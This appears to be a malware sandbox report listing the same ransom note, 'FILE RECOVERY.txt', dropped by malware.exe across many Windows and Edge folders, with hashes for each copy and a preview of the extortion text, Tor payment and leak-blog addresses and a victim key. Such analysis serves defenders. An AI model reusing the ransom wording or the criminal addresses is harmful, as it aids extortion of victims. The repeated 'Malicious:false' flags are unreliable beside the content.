                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Credentials\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
